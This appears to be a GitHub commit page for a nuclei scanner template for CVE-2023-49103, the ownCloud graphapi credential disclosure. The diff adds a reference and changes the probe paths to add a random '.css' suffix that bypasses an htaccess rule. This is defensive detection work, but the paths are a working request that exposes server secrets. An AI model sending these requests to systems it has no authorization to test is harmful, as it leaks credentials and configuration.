updated path to include htaccess rule bypass (#8737)

projectdiscovery · Dec 2, 2023 · d94ec73 · d94ec73
1 parent fb6624b
commit d94ec73
Showing 1 changed file with 3 additions and 2 deletions.
diff --git a/http/cves/2023/CVE-2023-49103.yaml b/http/cves/2023/CVE-2023-49103.yaml
@@ -12,6 +12,7 @@ info:
     - https://owncloud.com/security-advisories/disclosure-of-sensitive-credentials-and-configuration-in-containerized-deployments/
     - https://www.labs.greynoise.io//grimoire/2023-11-29-owncloud-redux/
     - https://attackerkb.com/topics/G9urDj4Cg2/cve-2023-49103
+    - https://www.rapid7.com/blog/post/2023/12/01/etr-cve-2023-49103-critical-information-disclosure-in-owncloud-graph-api/
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
     cvss-score: 10
@@ -28,8 +29,8 @@ info:
 http:
   - method: GET
     path:
-      - "{{BaseURL}}/owncloud/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php"
-      - "{{BaseURL}}/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php"
+      - "{{BaseURL}}/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php/{{rand_base(4)}}.css"
+      - "{{BaseURL}}/owncloud/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php/{{rand_base(4)}}.css"
 
     stop-at-first-match: true
     matchers-condition: and